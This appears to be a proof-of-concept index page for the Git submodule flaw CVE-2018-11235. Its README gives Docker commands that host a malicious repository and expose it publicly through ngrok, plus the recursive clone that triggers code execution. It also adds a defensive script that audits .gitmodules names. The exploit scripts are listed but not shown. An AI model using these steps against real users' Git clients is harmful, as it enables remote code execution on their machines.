Associated Vulnerability
Title: Git security vulnerability (CVE-2018-11235)
Description: Git is a free, open-source distributed version control system developed by the American software developer Linus Torvalds. Git contains a security vulnerability that stems from the program not properly validating submodule names taken from an untrusted .gitmodules file when adding them under the $GIT_DIR/modules directory. A remote attacker can exploit this vulnerability to execute arbitrary code with the help of a specially crafted .gitmodules file. The following versions are affected: Git versions before 2.13.7, 2.14.x versions before 2.14.4, 2.15.x versions before 2.15.2, 2.16.x versions before 2.16.4, 2.1
Description
CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration
Readme
# CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration
CVE-2018-11235 Git PoC and tunneling with Docker ngrok
### Build Dockerfile
```bash
$ docker build -t cve-2018-11235 .
```
### Create custom network for `ngrok`
```bash
$ docker network create myngroknet
```
### Start Git Http Server
```bash
$ docker run -d -p 8080:80 --net myngroknet --name cve-2018-11235 cve-2018-11235
```
### Start Ngrok HTTP Server for Git Server
```bash
$ docker run -d -p 4040:4040 --net myngroknet --name ngrok wernight/ngrok ngrok http cve-2018-11235:80 --authtoken PUT_YOUR_NGROK_AUTHTOKEN
```
### You can now access the API to find the assigned domain:
```bash
$ curl $(docker port ngrok 4040)/api/tunnels
{"tunnels":[{"name":"command_line","uri":"/api/tunnels/command_line","public_url":"https://f5fc-116-206-35-27.ngrok.io","proto":"https","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}},{"name":"command_line (http)","uri":"/api/tunnels/command_line%20%28http%29","public_url":"http://f5fc-116-206-35-27.ngrok.io","proto":"http","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}}],"uri":"/api/tunnels"}
```
### PoC on Vulnerable Git Server
```bash
$ git clone --recurse-submodules http://f5fc-116-206-35-27.ngrok.io/malicious.git
```
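Before cloning an untrusted repository with `--recurse-submodules`, a defender can inspect its `.gitmodules` for names that would escape `$GIT_DIR/modules`. The script below is an added example, not code from the PoC repository; it applies the rule the upstream fix introduced (reject empty names and any `..` path component, with both `/` and `\` as separators) to a constructed sample file.

```python
# Added example: audit a .gitmodules file for submodule names that could escape
# $GIT_DIR/modules (the CVE-2018-11235 pattern). Not part of the PoC repository.
import re

# Constructed sample .gitmodules: one benign submodule and one whose name
# contains a ".." path component. URLs are placeholders (example.invalid).
SAMPLE_GITMODULES = """\
[submodule "libs/helper"]
\tpath = libs/helper
\turl = https://example.invalid/helper.git
[submodule "../../escape"]
\tpath = vendor/escape
\turl = https://example.invalid/escape.git
"""

# Matches a git-config section header of the form [submodule "<name>"].
# Names containing escaped quotes (\") are not handled by this simple regex.
SECTION_RE = re.compile(r'^\s*\[submodule "(.*)"\]\s*$')


def parse_submodule_names(text):
    """Return the submodule names declared in .gitmodules, in file order."""
    names = []
    for line in text.splitlines():
        match = SECTION_RE.match(line)
        if match:
            names.append(match.group(1))
    return names


def is_safe_submodule_name(name):
    """Same rule as patched Git: non-empty, and no '..' path component.
    Both '/' and '\\' count as separators so the rule is platform independent."""
    if not name:
        return False
    return all(component != ".." for component in re.split(r"[/\\]", name))


def audit_gitmodules(text):
    """Return the unsafe submodule names found in the given .gitmodules text."""
    return [n for n in parse_submodule_names(text) if not is_safe_submodule_name(n)]


def audit_gitmodules_file(path):
    """Convenience wrapper: audit a .gitmodules file on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_gitmodules(fh.read())


if __name__ == "__main__":
    unsafe = audit_gitmodules(SAMPLE_GITMODULES)
    for name in unsafe:
        print(f"unsafe submodule name: {name!r}")
    raise SystemExit(1 if unsafe else 0)
```

The same check can run on a real checkout with `audit_gitmodules_file(".gitmodules")`, for example as a pre-receive hook or CI step, independent of whether the client's Git is patched.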
### References:
- [CVE-2018-11235 git RCE](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/)
- [CVE-2018-11235-Git-Submodule-CE](https://github.com/qweraqq/CVE-2018-11235-Git-Submodule-CE)
- [Expose Docker Container services on the Internet using the ngrok docker image](https://medium.com/oracledevs/expose-docker-container-services-on-the-internet-using-the-ngrok-docker-image-3f1ea0f9c47a)
- [wernight/ngrok](https://hub.docker.com/r/wernight/ngrok/)
- [CVE-2018-11235 - Quick & Dirty PoC](https://atorralba.github.io/CVE-2018-11235/)
File Snapshot
[4.0K] /data/pocs/0c35a80eedca18fb819fad5fa5e5e10d2c094188
├── [ 116] apache-settings.conf
├── [ 984] Dockerfile
├── [ 40] evil.sh
├── [ 901] generate-exploit.sh
└── [2.1K] README.md
0 directories, 5 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.